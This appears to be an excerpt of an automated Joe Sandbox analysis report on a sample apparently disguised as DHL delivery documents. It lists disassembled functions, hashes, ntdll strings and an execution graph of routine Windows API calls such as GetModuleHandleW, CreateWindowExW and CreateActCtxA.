                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4c13eac7778cc697e245ef6455b12514d9fd80310a47fb75acf94a1cc485c711
                        • Instruction ID: 54b743d961a2214092cc12ca08454a75c41faffc5ea31aa09495308f22eb1c5d
                        • Opcode Fuzzy Hash: 4c13eac7778cc697e245ef6455b12514d9fd80310a47fb75acf94a1cc485c711
                        • Instruction Fuzzy Hash: 739002A120194482D14072584845B0F410997E1602F95C019A8156554DC915C9555721
                        Function 01C539B0 Relevance: .0, Instructions: 4COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 216040b857d63e96d948a0a654ab0468a81ef1db6e6dc188f4d0856e5b89a69f
                        • Instruction ID: 2d7f70c63e92da034aa25739f942925c99b6d03c9a60bca561a382e120486999
                        • Opcode Fuzzy Hash: 216040b857d63e96d948a0a654ab0468a81ef1db6e6dc188f4d0856e5b89a69f
                        • Instruction Fuzzy Hash: A89002A124555142D150715C444561A4009B7E0601F55C021A4814594EC555C9556321
                        Function 01C53D70 Relevance: .0, Instructions: 4COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 09f42c393b701be5218807fecbebc7c635d16c04a30f294439d662fff01961e4
                        • Instruction ID: 1d8f5bd8a0f27c3c54d8bc219ef7abfdf2d9444982768953a42d87d68750caab
                        • Opcode Fuzzy Hash: 09f42c393b701be5218807fecbebc7c635d16c04a30f294439d662fff01961e4
                        • Instruction Fuzzy Hash: 0F9002B520150442D5107158584564A004A97D0701F55D411A4424558EC654C9A1A221
                        Function 01C53D10 Relevance: .0, Instructions: 4COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b6ac0382a0ba044d2991fc900b5b2f2a03f01d9e0e5ef888850370e4c4d84477
                        • Instruction ID: af9792022d51671b032772b2a875dfc2ef98eb928cded59aa361bffcbe40a5f4
                        • Opcode Fuzzy Hash: b6ac0382a0ba044d2991fc900b5b2f2a03f01d9e0e5ef888850370e4c4d84477
                        • Instruction Fuzzy Hash: EB9002B120250182954072585845A4E410997E1702B95D415A4015554DC914C9615321
                        Function 01C52C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                        • Instruction ID: 725614c8d81029feccd9e1944bbfb00ba00ec8023010370befa4786222298689
                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                        • Instruction Fuzzy Hash:
                        Function 01C52890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: ___swprintf_l
                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                        • API String ID: 48624451-2108815105
                        • Opcode ID: d327fa5c934b2539746ea30e73c447ede12b112e2a13d30ef0d27d87f3e2621a
                        • Instruction ID: c8656019b83670ce1be57c4f24e407146c2c82784ed422b23a16ef5054665883
                        • Opcode Fuzzy Hash: d327fa5c934b2539746ea30e73c447ede12b112e2a13d30ef0d27d87f3e2621a
                        • Instruction Fuzzy Hash: 7251E3B6A00156EECB61DB9D89C097EFBF8BB08244714826AE8A5D7641D334DF9087A0
                        Function 01CC2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: ___swprintf_l
                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                        • API String ID: 48624451-2108815105
                        • Opcode ID: 6f06e2c4243449f0fc2b1a44ff974264403abd99dd200b5164ba6f6acb599b68
                        • Instruction ID: 966b90679a1e936219355b567865d752e14f274a5cdb84344d3be3b354c022af
                        • Opcode Fuzzy Hash: 6f06e2c4243449f0fc2b1a44ff974264403abd99dd200b5164ba6f6acb599b68
                        • Instruction Fuzzy Hash: C851E275A00646EFCB31DE9DC89097FFBF8EB54600B04846EE596D7682E6B4EF408760
                        Function 01C47630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                        Download Yara Rule
                        Strings
                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01C84725
                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 01C84787
                        • ExecuteOptions, xrefs: 01C846A0
                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01C846FC
                        • Execute=1, xrefs: 01C84713
                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01C84655
                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01C84742
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                        • API String ID: 0-484625025
                        • Opcode ID: 9f760b1f846568f0b73651fa749dd5d165fd4d731ccc4a91ec7df5bfda9d05c4
                        • Instruction ID: 741f4b51b6cc94dbf0b7f2b913c56b30f4d2a38cdf0fbc3454b59e46e1c67a18
                        • Opcode Fuzzy Hash: 9f760b1f846568f0b73651fa749dd5d165fd4d731ccc4a91ec7df5bfda9d05c4
                        • Instruction Fuzzy Hash: 9A51163160431AEBEF25EBA9DC89BEA7BB9EF14304F0404D9D605A7191EB70DA458F50
                        Function 01CE6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                        • Instruction ID: db6ed605f01430ae4d298a249e5819f4f21ee5ddd26b59d31545598d998e0ce5
                        • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                        • Instruction Fuzzy Hash: AA022471518342EFD709CF18C498A6BBBE5EFD8704F44892DF9898B260DB31E945CB82
                        Function 01C5B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: __aulldvrm
                        • String ID: +$-$0$0
                        • API String ID: 1302938615-699404926
                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                        • Instruction ID: 8efae6f526143f9d6e22c2a0f3fc99a24a620860efc0a13b9e286248968ea9c1
                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                        • Instruction Fuzzy Hash: 5281B170A45249CEEF698E6CC8917BEBFA3AF45350F184159DC61A7291CB34CEC08769
                        Function 01CC20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: ___swprintf_l
                        • String ID: %%%u$[$]:%u
                        • API String ID: 48624451-2819853543
                        • Opcode ID: a1cc29f0e07830d388651f4b2d1a306d522e41afc77c12fcc3b0fc40a5a6e918
                        • Instruction ID: 0ed8577362bb70366c31b98195ccec7e8527088c400aa4e5691f8736e1a2ba16
                        • Opcode Fuzzy Hash: a1cc29f0e07830d388651f4b2d1a306d522e41afc77c12fcc3b0fc40a5a6e918
                        • Instruction Fuzzy Hash: B121357AA00119EBDB11DFB9DC40AEE7BF9EF94A54F44012AED05E3240E730DE519BA1
                        Function 01C3F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                        Download Yara Rule
                        Strings
                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01C802E7
                        • RTL: Re-Waiting, xrefs: 01C8031E
                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01C802BD
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                        • API String ID: 0-2474120054
                        • Opcode ID: 4b294903890d4a2e3552adb4f975b2ec067ea5730dfdf8d02a52873ad741b939
                        • Instruction ID: b40c24f7b3b0efa8f263b6464392b42155506e8d8af410b47b44094bdf5e18c3
                        • Opcode Fuzzy Hash: 4b294903890d4a2e3552adb4f975b2ec067ea5730dfdf8d02a52873ad741b939
                        • Instruction Fuzzy Hash: A0E1B030A04742DFD726DF28C884B2ABBE0BB85728F140A5DF5A5CB2E1D774D958CB42
                        Function 01C4BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                        Download Yara Rule
                        Strings
                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01C87B7F
                        • RTL: Resource at %p, xrefs: 01C87B8E
                        • RTL: Re-Waiting, xrefs: 01C87BAC
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                        • API String ID: 0-871070163
                        • Opcode ID: bd0aaeaf6dbcd807637299b6063b4c903de234b1e3e42e1727ab100afa8eb82f
                        • Instruction ID: 035eedd8ef18a2ca073519d6e796323ba94e760d7c7310d7f3f0990564513638
                        • Opcode Fuzzy Hash: bd0aaeaf6dbcd807637299b6063b4c903de234b1e3e42e1727ab100afa8eb82f
                        • Instruction Fuzzy Hash: A441D235304702DFEB25DE29C940B6AB7E5EF98710F100A1DFA5ADB680DB31E945CB91
                        Function 01C4B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                        Download Yara Rule
                        APIs
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01C8728C
                        Strings
                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01C87294
                        • RTL: Resource at %p, xrefs: 01C872A3
                        • RTL: Re-Waiting, xrefs: 01C872C1
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                        • API String ID: 885266447-605551621
                        • Opcode ID: 265367975c329b684c6e55e52fa5bede2006fb60f58e59dca118cf1c5bdc1a83
                        • Instruction ID: bdf09c76c52d77e6d15bf4cc337715f41ccd1898f70ba60495e6ce6a0f8e7a0b
                        • Opcode Fuzzy Hash: 265367975c329b684c6e55e52fa5bede2006fb60f58e59dca118cf1c5bdc1a83
                        • Instruction Fuzzy Hash: 42410231704702EBDB21EE29CC81B6ABBA5FB94714F200619F955EB640EB31F952CBD1
                        Function 01CC2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: ___swprintf_l
                        • String ID: %%%u$]:%u
                        • API String ID: 48624451-3050659472
                        • Opcode ID: d6a94df141355a755fea51af3b42c930ebd1e579a443ada21c8160e2df9dab92
                        • Instruction ID: 58814cd53178e8d849312857d8c3ee34db8e9fc4cd1f16e4df72d93d03fba79b
                        • Opcode Fuzzy Hash: d6a94df141355a755fea51af3b42c930ebd1e579a443ada21c8160e2df9dab92
                        • Instruction Fuzzy Hash: 26315772600119DFDB21DE29CC40BEE77BCEB54A10F44459AE949E3240EB30DE549B60
                        Function 01C57D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: __aulldvrm
                        • String ID: +$-
                        • API String ID: 1302938615-2137968064
                        • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                        • Instruction ID: d4b3575a2f56ede44a47e5f9003d57d5569d4f955aea489c5db09f8b236a0357
                        • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                        • Instruction Fuzzy Hash: 1991A371E00316DEEBA4DF6EC8806BEBBA5AF44320F94461AED55A72C0D674CAC0C759
                        Function 01C19126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: $$@
                        • API String ID: 0-1194432280
                        • Opcode ID: d1c85d340ad56023d81f0c7a1ebcaa77952d1955a7bc1d0482770f53eb3f70af
                        • Instruction ID: 7aba078901577724d8f6b9e4166f8f06433aae4b85d80a564ebcf712381dc3ab
                        • Opcode Fuzzy Hash: d1c85d340ad56023d81f0c7a1ebcaa77952d1955a7bc1d0482770f53eb3f70af
                        • Instruction Fuzzy Hash: B4813C71D00269DBDB35CB54CC48BEEB7B4AB48714F0041EAEA19B7280D7709E84DFA0

                        Execution Graph

                        Execution Coverage:12.3%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:100
                        Total number of Limit Nodes:8
                        execution_graph 24314 4a14050 24315 4a14092 24314->24315 24317 4a14099 24314->24317 24316 4a140ea CallWindowProcW 24315->24316 24315->24317 24316->24317 24268 76acd0 24272 76adc8 24268->24272 24280 76adb8 24268->24280 24269 76acdf 24273 76add9 24272->24273 24275 76adfc 24272->24275 24273->24275 24288 76b060 24273->24288 24292 76b050 24273->24292 24274 76adf4 24274->24275 24276 76b000 GetModuleHandleW 24274->24276 24275->24269 24277 76b02d 24276->24277 24277->24269 24281 76add9 24280->24281 24282 76adfc 24280->24282 24281->24282 24286 76b060 LoadLibraryExW 24281->24286 24287 76b050 LoadLibraryExW 24281->24287 24282->24269 24283 76adf4 24283->24282 24284 76b000 GetModuleHandleW 24283->24284 24285 76b02d 24284->24285 24285->24269 24286->24283 24287->24283 24289 76b074 24288->24289 24290 76b099 24289->24290 24296 76a188 24289->24296 24290->24274 24293 76b074 24292->24293 24294 76a188 LoadLibraryExW 24293->24294 24295 76b099 24293->24295 24294->24295 24295->24274 24297 76b240 LoadLibraryExW 24296->24297 24299 76b2b9 24297->24299 24299->24290 24300 76d458 24301 76d49e 24300->24301 24305 76d628 24301->24305 24308 76d638 24301->24308 24302 76d58b 24306 76d666 24305->24306 24311 76b7b0 24305->24311 24306->24302 24309 76b7b0 DuplicateHandle 24308->24309 24310 76d666 24309->24310 24310->24302 24312 76d6a0 DuplicateHandle 24311->24312 24313 76d736 24312->24313 24313->24306 24318 764668 24319 76467a 24318->24319 24320 764686 24319->24320 24324 764778 24319->24324 24329 763e1c 24320->24329 24322 7646a5 24325 76479d 24324->24325 24333 764878 24325->24333 24337 764888 24325->24337 24330 763e27 24329->24330 24345 765c6c 24330->24345 24332 767048 24332->24322 24335 7648af 24333->24335 24334 76498c 24334->24334 24335->24334 24341 76449c 24335->24341 24338 7648af 24337->24338 24339 76449c CreateActCtxA 24338->24339 24340 76498c 24338->24340 24339->24340 24342 765918 CreateActCtxA 24341->24342 24344 7659db 24342->24344 24346 765c77 24345->24346 24349 765c9c 24346->24349 24348 767105 24348->24332 24350 765ca7 24349->24350 24353 765ccc 24350->24353 24352 7671e2 24352->24348 24354 765cd7 24353->24354 24357 765cfc 24354->24357 24356 7672e5 24356->24352 24358 765d07 24357->24358 24361 768629 24358->24361 24362 76cd90 24358->24362 24367 76cd81 24358->24367 24361->24356 24364 76cdb1 24362->24364 24363 76cdd5 24363->24361 24364->24363 24372 76cf40 24364->24372 24376 76cf3f 24364->24376 24368 76cdb1 24367->24368 24369 76cdd5 24368->24369 24370 76cf40 2 API calls 24368->24370 24371 76cf3f 2 API calls 24368->24371 24369->24361 24370->24369 24371->24369 24373 76cf4d 24372->24373 24374 76cf87 24373->24374 24380 76b7a0 24373->24380 24374->24363 24378 76cf4d 24376->24378 24377 76cf87 24377->24363 24378->24377 24379 76b7a0 2 API calls 24378->24379 24379->24377 24381 76b7ab 24380->24381 24383 76dc98 24381->24383 24384 76d0a4 24381->24384 24383->24383 24385 76d0af 24384->24385 24386 765cfc 2 API calls 24385->24386 24387 76dd07 24386->24387 24390 76fa88 24387->24390 24388 76dd41 24388->24383 24391 76fac5 24390->24391 24392 76fab9 24390->24392 24391->24388 24392->24391 24393 4a109b0 CreateWindowExW CreateWindowExW 24392->24393 24394 4a109c0 CreateWindowExW CreateWindowExW 24392->24394 24393->24391 24394->24391

                        Executed Functions

                        Function 0076ADC8 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 579 76adc8-76add7 580 76ae03-76ae07 579->580 581 76add9-76ade6 call 7693f4 579->581 582 76ae1b-76ae5c 580->582 583 76ae09-76ae13 580->583 586 76adfc 581->586 587 76ade8 581->587 590 76ae5e-76ae66 582->590 591 76ae69-76ae77 582->591 583->582 586->580 634 76adee call 76b060 587->634 635 76adee call 76b050 587->635 590->591 593 76ae9b-76ae9d 591->593 594 76ae79-76ae7e 591->594 592 76adf4-76adf6 592->586 595 76af38-76aff8 592->595 596 76aea0-76aea7 593->596 597 76ae80-76ae87 call 76a130 594->597 598 76ae89 594->598 629 76b000-76b02b GetModuleHandleW 595->629 630 76affa-76affd 595->630 601 76aeb4-76aebb 596->601 602 76aea9-76aeb1 596->602 600 76ae8b-76ae99 597->600 598->600 600->596 604 76aebd-76aec5 601->604 605 76aec8-76aed1 call 76a140 601->605 602->601 604->605 610 76aed3-76aedb 605->610 611 76aede-76aee3 605->611 610->611 612 76aee5-76aeec 611->612 613 76af01-76af0e 611->613 612->613 615 76aeee-76aefe call 76a150 call 76a160 612->615 620 76af10-76af2e 613->620 621 76af31-76af37 613->621 615->613 620->621 631 76b034-76b048 629->631 632 76b02d-76b033 629->632 630->629 632->631 634->592 635->592
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0076B01E
                        Memory Dump Source
                        • Source File: 00000009.00000002.2244070206.0000000000760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_760000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: 28ec6f558b84b070c3ed4242c2e6db03509ed46f3a38b8416a6b64bb03c963d3
                        • Instruction ID: 47ac7f704e049a09bc92cf6d6e2711049d4cada9d70a7708e882f434067771ac
                        • Opcode Fuzzy Hash: 28ec6f558b84b070c3ed4242c2e6db03509ed46f3a38b8416a6b64bb03c963d3
                        • Instruction Fuzzy Hash: E77123B0A00B059FD724DF29D45579ABBF1FF88304F10892EE886EBA40D779E8458F91
                        Function 04A118E4 Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 636 4a118e4-4a11956 638 4a11961-4a11968 636->638 639 4a11958-4a1195e 636->639 640 4a11973-4a11a12 CreateWindowExW 638->640 641 4a1196a-4a11970 638->641 639->638 643 4a11a14-4a11a1a 640->643 644 4a11a1b-4a11a53 640->644 641->640 643->644 648 4a11a60 644->648 649 4a11a55-4a11a58 644->649 650 4a11a61 648->650 649->648 650->650
                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04A11A02
                        Memory Dump Source
                        • Source File: 00000009.00000002.2465947779.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_4a10000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: CreateWindow
                        • String ID:
                        • API String ID: 716092398-0
                        • Opcode ID: 6b3430a875423e858a6096ced6e951112f740d467ec9faf68d4b81855f04912c
                        • Instruction ID: cd8af8c599b8f687b633287487cea66e7d7c607e41bb22ff4bcc1a0db26cbbc3
                        • Opcode Fuzzy Hash: 6b3430a875423e858a6096ced6e951112f740d467ec9faf68d4b81855f04912c
                        • Instruction Fuzzy Hash: 7F51D1B1D00309DFDB14CFA9C984ADDBFB1BF48310F64822AE419AB260D775A945CF91
                        Function 04A118F0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 651 4a118f0-4a11956 652 4a11961-4a11968 651->652 653 4a11958-4a1195e 651->653 654 4a11973-4a11a12 CreateWindowExW 652->654 655 4a1196a-4a11970 652->655 653->652 657 4a11a14-4a11a1a 654->657 658 4a11a1b-4a11a53 654->658 655->654 657->658 662 4a11a60 658->662 663 4a11a55-4a11a58 658->663 664 4a11a61 662->664 663->662 664->664
                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04A11A02
                        Memory Dump Source
                        • Source File: 00000009.00000002.2465947779.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_4a10000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: CreateWindow
                        • String ID:
                        • API String ID: 716092398-0
                        • Opcode ID: b946c3bc365cdf9322116bb5b52e7865453c1eb30cf9c66840413618f270e83b
                        • Instruction ID: aa02353af34a8deda7a11ce979bdd5db75473206a7f58c1667de136dd9c34b42
                        • Opcode Fuzzy Hash: b946c3bc365cdf9322116bb5b52e7865453c1eb30cf9c66840413618f270e83b
                        • Instruction Fuzzy Hash: A141C2B1D00309DFDB14CF99C884ADEBFB5BF48310F64822AE419AB210D775A945CF91
                        Function 00765A84 Relevance: 1.6, APIs: 1, Instructions: 105COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 665 765a84-765b14
                        Memory Dump Source
                        • Source File: 00000009.00000002.2244070206.0000000000760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_760000_YybGLWQSx.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: acf3f9494d033779d1dda1c85c7d8e81a2805949f06f943922e2a094dc07f984
                        • Instruction ID: 202790bd84328cdad9447d39b41d369c305fb01aa4a52fab624135d524eda6d0
                        • Opcode Fuzzy Hash: acf3f9494d033779d1dda1c85c7d8e81a2805949f06f943922e2a094dc07f984
                        • Instruction Fuzzy Hash: 5A31AFB1804B48CFDB11CFA8C885AEDBFF0EF55314F148159C816AB251D7796946EF41
                        Function 0076590C Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 668 76590c-76598c 670 76598f-7659d9 CreateActCtxA 668->670 672 7659e2-765a3c 670->672 673 7659db-7659e1 670->673 680 765a3e-765a41 672->680 681 765a4b-765a4f 672->681 673->672 680->681 682 765a60 681->682 683 765a51-765a5d 681->683 685 765a61 682->685 683->682 685->685
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 007659C9
                        Memory Dump Source
                        • Source File: 00000009.00000002.2244070206.0000000000760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_760000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: 5fa5d27f68cc98ee8c7f2cbb2d9b77fd1a5346ab8be70db4e5baa359ac308286
                        • Instruction ID: 05b88c06389d1b584023105aeaab6396512c987593dfad9da2e6cbb8f31f21a3
                        • Opcode Fuzzy Hash: 5fa5d27f68cc98ee8c7f2cbb2d9b77fd1a5346ab8be70db4e5baa359ac308286
                        • Instruction Fuzzy Hash: 0C41E2B1D00719CFDB24DFA9C884BCDBBB1BF88304F24816AD419AB251DB756946CF91
                        Function 0076449C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 686 76449c-7659d9 CreateActCtxA 690 7659e2-765a3c 686->690 691 7659db-7659e1 686->691 698 765a3e-765a41 690->698 699 765a4b-765a4f 690->699 691->690 698->699 700 765a60 699->700 701 765a51-765a5d 699->701 703 765a61 700->703 701->700 703->703
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 007659C9
                        Memory Dump Source
